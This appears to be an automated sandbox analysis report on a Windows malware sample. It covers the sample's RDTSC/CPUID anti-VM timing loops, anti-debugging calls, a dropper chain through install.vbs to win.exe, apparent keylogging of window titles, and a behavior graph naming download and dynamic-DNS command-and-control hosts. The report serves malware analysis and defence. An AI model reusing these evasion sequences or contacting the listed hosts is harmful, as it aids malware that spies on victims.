            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000000560153 second address: 0000000000560297 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 jmp 00007F8D488E6046h 0x00000005 test dl, bl 0x00000007 mov dword ptr [ebp-29h], edi 0x0000000a mov edi, 0B6FB570h 0x0000000f sub edi, 3B5E49F8h 0x00000015 xor edi, 6B2CFFD1h 0x0000001b sub edi, BB3D91A9h 0x00000021 sub esp, edi 0x00000023 mov edi, dword ptr [ebp-29h] 0x00000026 jmp 00007F8D488E6042h 0x00000028 test cl, cl 0x0000002a jmp 00007F8D488E6042h 0x0000002c cld 0x0000002d jmp 00007F8D488E6042h 0x0000002f cmp edx, ebx 0x00000031 jmp 00007F8D488E6046h 0x00000033 test dl, bl 0x00000035 jmp 00007F8D488E6046h 0x00000037 test ch, bh 0x00000039 jmp 00007F8D488E6042h 0x0000003b cmp edx, edx 0x0000003d push ebp 0x0000003e jmp 00007F8D488E6046h 0x00000040 test ah, bh 0x00000042 jmp 00007F8D488E6042h 0x00000044 jmp 00007F8D488E6050h 0x00000046 mov ebp, esp 0x00000048 jmp 00007F8D488E6046h 0x0000004a cmp cl, cl 0x0000004c mov dword ptr [ebp+0000013Ch], 00000000h 0x00000056 jmp 00007F8D488E6046h 0x00000058 pushad 0x00000059 mov eax, 000000AEh 0x0000005e rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000002B48DD5 second address: 0000000002B48DD5 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000002B45EBF second address: 0000000002B45EBF instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000002B47A03 second address: 0000000002B47A03 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp bx, dx 0x0000000d jne 00007F8D48A28187h 0x0000000f push dword ptr [esp+04h] 0x00000013 jmp 00007F8D48A28212h 0x00000015 cmp al, cl 0x00000017 call 00007F8D48A2864Ch 0x0000001c cmp cl, bl 0x0000001e mov ebx, dword ptr [esp+04h] 0x00000022 xor ecx, ecx 0x00000024 test ecx, DBADF924h 0x0000002a add ecx, 02h 0x0000002d cmp word ptr [ebx+ecx], 0000h 0x00000032 jne 00007F8D48A281F8h 0x00000034 add ecx, 02h 0x00000037 cmp word ptr [ebx+ecx], 0000h 0x0000003c jne 00007F8D48A281F8h 0x0000003e add ecx, 02h 0x00000041 cmp word ptr [ebx+ecx], 0000h 0x00000046 jne 00007F8D48A281F8h 0x00000048 add ecx, 02h 0x0000004b cmp word ptr [ebx+ecx], 0000h 0x00000050 jne 00007F8D48A281F8h 0x00000052 add ecx, 02h 0x00000055 cmp word ptr [ebx+ecx], 0000h 0x0000005a jne 00007F8D48A281F8h 0x0000005c add ecx, 02h 0x0000005f cmp word ptr [ebx+ecx], 0000h 0x00000064 jne 00007F8D48A281F8h 0x00000066 add ecx, 02h 0x00000069 cmp word ptr [ebx+ecx], 0000h 0x0000006e jne 00007F8D48A281F8h 0x00000070 test dx, dx 0x00000073 retn 0004h 0x00000076 jmp 00007F8D48A28212h 0x00000078 cmp dl, cl 0x0000007a sub ecx, 02h 0x0000007d add eax, 02h 0x00000080 jmp 00007F8D48A28216h 0x00000082 cmp ax, 0000C33Eh 0x00000086 mov bx, word ptr [eax+ecx] 0x0000008a mov dx, word ptr [esi+ecx] 0x0000008e jmp 00007F8D48A28212h 0x00000090 pushad 0x00000091 rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000002B459EB second address: 0000000002B459EB instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000002B4559F second address: 0000000002B4559F instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020A8DD5 second address: 00000000020A8DD5 instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020A5EBF second address: 00000000020A5EBF instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020A7A03 second address: 00000000020A7A03 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp bx, dx 0x0000000d jne 00007F8D48A28187h 0x0000000f push dword ptr [esp+04h] 0x00000013 jmp 00007F8D48A28212h 0x00000015 cmp al, cl 0x00000017 call 00007F8D48A2864Ch 0x0000001c cmp cl, bl 0x0000001e mov ebx, dword ptr [esp+04h] 0x00000022 xor ecx, ecx 0x00000024 test ecx, DBADF924h 0x0000002a add ecx, 02h 0x0000002d cmp word ptr [ebx+ecx], 0000h 0x00000032 jne 00007F8D48A281F8h 0x00000034 add ecx, 02h 0x00000037 cmp word ptr [ebx+ecx], 0000h 0x0000003c jne 00007F8D48A281F8h 0x0000003e add ecx, 02h 0x00000041 cmp word ptr [ebx+ecx], 0000h 0x00000046 jne 00007F8D48A281F8h 0x00000048 add ecx, 02h 0x0000004b cmp word ptr [ebx+ecx], 0000h 0x00000050 jne 00007F8D48A281F8h 0x00000052 add ecx, 02h 0x00000055 cmp word ptr [ebx+ecx], 0000h 0x0000005a jne 00007F8D48A281F8h 0x0000005c add ecx, 02h 0x0000005f cmp word ptr [ebx+ecx], 0000h 0x00000064 jne 00007F8D48A281F8h 0x00000066 add ecx, 02h 0x00000069 cmp word ptr [ebx+ecx], 0000h 0x0000006e jne 00007F8D48A281F8h 0x00000070 test dx, dx 0x00000073 retn 0004h 0x00000076 jmp 00007F8D48A28212h 0x00000078 cmp dl, cl 0x0000007a sub ecx, 02h 0x0000007d add eax, 02h 0x00000080 jmp 00007F8D48A28216h 0x00000082 cmp ax, 0000C33Eh 0x00000086 mov bx, word ptr [eax+ecx] 0x0000008a mov dx, word ptr [esi+ecx] 0x0000008e jmp 00007F8D48A28212h 0x00000090 pushad 0x00000091 rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020A59EB second address: 00000000020A59EB instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 00000000020A559F second address: 00000000020A559F instructions:
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000000561732 second address: 0000000000561732 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [eax+ecx-01h], 0000005Eh 0x0000000f cmp cx, dx 0x00000012 xor byte ptr [eax+ecx-01h], 00000026h 0x00000017 xor byte ptr [eax+ecx-01h], 00000076h 0x0000001c cmp bl, 0000005Bh 0x0000001f add byte ptr [eax+ecx-01h], FFFFFFF2h 0x00000024 dec ecx 0x00000025 cmp ecx, 00000000h 0x00000028 jne 00007F8D48A281D7h 0x0000002a pushad 0x0000002b rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeRDTSC instruction interceptor: First address: 0000000000561732 second address: 0000000000561732 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [eax+ecx-01h], 0000005Eh 0x0000000f cmp cx, dx 0x00000012 xor byte ptr [eax+ecx-01h], 00000026h 0x00000017 xor byte ptr [eax+ecx-01h], 00000076h 0x0000001c cmp bl, 0000005Bh 0x0000001f add byte ptr [eax+ecx-01h], FFFFFFF2h 0x00000024 dec ecx 0x00000025 cmp ecx, 00000000h 0x00000028 jne 00007F8D488E6007h 0x0000002a pushad 0x0000002b rdtsc
            Source: C:\Windows\SysWOW64\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0BF8 rdtsc
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: EnumServicesStatusA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: EnumServicesStatusA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: EnumServicesStatusA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: EnumServicesStatusA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: EnumServicesStatusA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: EnumServicesStatusA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: EnumServicesStatusA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: EnumServicesStatusA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: EnumServicesStatusA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: EnumServicesStatusA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: EnumServicesStatusA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: EnumServicesStatusA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: EnumServicesStatusA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: EnumServicesStatusA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: EnumServicesStatusA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: EnumServicesStatusA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: EnumServicesStatusA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: EnumServicesStatusA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: EnumServicesStatusA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: EnumServicesStatusA,
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Users\user\AppData\Roaming\win.exeWindow / User API: threadDelayed 641
            Source: C:\Users\user\AppData\Roaming\win.exe TID: 3756Thread sleep count: 641 > 30
            Source: C:\Users\user\AppData\Roaming\win.exe TID: 3756Thread sleep time: -6410000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\win.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\win.exeLast function: Thread delayed
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exe, 00000007.00000002.350529718.0000000000927000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWPP
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exe, 00000007.00000002.350519839.0000000000910000.00000004.00000001.sdmp, win.exe, 00000014.00000002.756717088.0000000000740000.00000004.00000001.sdmp, win.exe, 00000015.00000002.544294519.00000000007B0000.00000004.00000001.sdmp, win.exe, 00000016.00000002.581689179.0000000002270000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=wininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exe, 00000000.00000002.287924663.00000000020B0000.00000004.00000001.sdmp, win.exe, 0000000F.00000002.482804268.0000000002200000.00000004.00000001.sdmp, win.exe, 00000010.00000002.540786741.0000000002B50000.00000004.00000001.sdmp, win.exe, 00000011.00000002.481669950.00000000020B0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exe, 00000007.00000002.350579233.0000000000970000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exe, 00000000.00000002.287924663.00000000020B0000.00000004.00000001.sdmp, SecuriteInfo.com.__vbaHresultCheckObj.9138.exe, 00000007.00000002.350519839.0000000000910000.00000004.00000001.sdmp, win.exe, 0000000F.00000002.482804268.0000000002200000.00000004.00000001.sdmp, win.exe, 00000010.00000002.540786741.0000000002B50000.00000004.00000001.sdmp, win.exe, 00000011.00000002.481669950.00000000020B0000.00000004.00000001.sdmp, win.exe, 00000014.00000002.756717088.0000000000740000.00000004.00000001.sdmp, win.exe, 00000015.00000002.544294519.00000000007B0000.00000004.00000001.sdmp, win.exe, 00000016.00000002.581689179.0000000002270000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\win.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\win.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\win.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\win.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\win.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\win.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\win.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\win.exeThread information set: HideFromDebugger
            Source: C:\Users\user\AppData\Roaming\win.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\win.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\win.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\win.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\win.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\win.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\win.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0BF8 rdtsc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A6F68 LdrInitializeThunk,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A3A49 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A3A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A82EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A5B33 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A7E70 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A2E96 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A8DBB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A8DD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00563A49 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005682EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00563A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00565B33 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00568DD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00568DBB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00567E70 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00562E96 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F3A49 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F3A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F82EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F5B33 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F7E70 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F2E96 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F8DBB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F8DD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B43A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B482EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B43A49 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B45B33 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B42E96 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B47E70 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B48DBB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_02B48DD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A3A49 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A3A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A82EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A5B33 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A7E70 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A2E96 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A8DBB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_020A8DD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00563A49 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_005682EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00563A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00565B33 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00568DD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00568DBB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00567E70 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 21_2_00562E96 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00563A49 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005682EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00563A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00565B33 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00568DD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00568DBB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00567E70 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00562E96 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exe 'C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exe'
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe
            Source: C:\Users\user\AppData\Roaming\win.exeProcess created: C:\Users\user\AppData\Roaming\win.exe C:\Users\user\AppData\Roaming\win.exe
            Source: C:\Users\user\AppData\Roaming\win.exeProcess created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'
            Source: C:\Users\user\AppData\Roaming\win.exeProcess created: C:\Users\user\AppData\Roaming\win.exe 'C:\Users\user\AppData\Roaming\win.exe'
            Source: win.exe, 00000014.00000002.757384376.0000000002357000.00000004.00000040.sdmpBinary or memory string: Program Manager
            Source: win.exe, 00000014.00000002.757384376.0000000002357000.00000004.00000040.sdmpBinary or memory string: Program ManagerD
            Source: win.exe, 00000014.00000002.757067184.0000000000D50000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: win.exe, 00000014.00000002.757384376.0000000002357000.00000004.00000040.sdmpBinary or memory string: Program Managerb
            Source: win.exe, 00000014.00000002.757067184.0000000000D50000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: win.exe, 00000014.00000002.757067184.0000000000D50000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
            Source: win.exe, 00000014.00000002.757384376.0000000002357000.00000004.00000040.sdmpBinary or memory string: Program Managerer ]
            Source: logs.dat.20.drBinary or memory string: [ Program Manager ]
            Source: win.exe, 00000014.00000002.757384376.0000000002357000.00000004.00000040.sdmpBinary or memory string: Program Managerer:
            Source: win.exe, 00000014.00000002.757384376.0000000002357000.00000004.00000040.sdmpBinary or memory string: Program Managerinistrator
            Source: win.exe, 00000014.00000002.757067184.0000000000D50000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
            Source: win.exe, 00000014.00000002.757067184.0000000000D50000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: win.exe, 00000014.00000002.757384376.0000000002357000.00000004.00000040.sdmpBinary or memory string: Program Manager25VW5
            Source: win.exe, 00000014.00000002.757384376.0000000002357000.00000004.00000040.sdmpBinary or memory string: Program ManagerZ
            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsScripting11Registry Run Keys / Startup Folder1Process Injection12Masquerading11OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder1Virtualization/Sandbox Evasion23LSASS MemorySecurity Software Discovery731Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerVirtualization/Sandbox Evasion23SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting11NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol112Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Service Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemFile and Directory Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Information Discovery312Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 430702 Sample: SecuriteInfo.com.__vbaHresu... Startdate: 07/06/2021 Architecture: WINDOWS Score: 100 51 Multi AV Scanner detection for domain / URL 2->51 53 Found malware configuration 2->53 55 Multi AV Scanner detection for submitted file 2->55 57 4 other signatures 2->57 10 SecuriteInfo.com.__vbaHresultCheckObj.9138.exe 2 2->10         started        13 win.exe 1 2->13         started        15 win.exe 1 2->15         started        process3 signatures4 67 Contains functionality to detect hardware virtualization (CPUID execution measurement) 10->67 69 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 10->69 71 Tries to detect Any.run 10->71 73 Tries to detect virtualization through RDTSC time measurements 10->73 17 SecuriteInfo.com.__vbaHresultCheckObj.9138.exe 4 10 10->17         started        75 Hides threads from debuggers 13->75 22 win.exe 6 13->22         started        24 win.exe 6 15->24         started        process5 dnsIp6 45 ztechinternational.com 192.185.113.219, 49715, 49718, 49720 UNIFIEDLAYER-AS-1US United States 17->45 39 C:\Users\user\AppData\Roaming\win.exe, PE32 17->39 dropped 41 C:\Users\user\...\win.exe:Zone.Identifier, ASCII 17->41 dropped 43 C:\Users\user\AppData\Local\...\install.vbs, data 17->43 dropped 59 Tries to detect Any.run 17->59 61 Hides threads from debuggers 17->61 26 wscript.exe 1 17->26         started        file7 signatures8 process9 process10 28 cmd.exe 1 26->28         started        process11 30 win.exe 1 28->30         started        33 conhost.exe 28->33         started        signatures12 77 Multi AV Scanner detection for dropped file 30->77 79 Contains functionality to detect hardware virtualization (CPUID execution measurement) 30->79 81 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 30->81 83 3 other signatures 30->83 35 win.exe 2 7 30->35         started        process13 dnsIp14 47 gsyagvxnzmkoplbhduisbagtevcnxmzlopljdgye.ydns.eu 188.72.110.19, 2177 TRABIAMD Netherlands 35->47 49 ztechinternational.com 